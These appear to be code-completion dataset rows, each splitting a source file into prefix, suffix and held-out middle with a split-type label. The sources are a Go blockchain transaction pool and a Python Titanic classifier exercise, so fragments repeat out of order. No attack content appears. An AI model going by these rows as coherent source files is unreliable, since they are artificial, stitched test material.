tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
}
| {
pool.TxEnqueue(ch)
} | conditional_block |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
}
func (pool *TxPool) | () {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch {
pool.TxEnqueue(ch)
}
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
/*for _, tx := range pool.mustPackTxs {
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
}
| refreshWaitPool | identifier_name |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
}
func (pool *TxPool) refreshWaitPool() {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch {
pool.TxEnqueue(ch)
}
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
| ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
} | /*for _, tx := range pool.mustPackTxs { | random_line_split |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score | if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
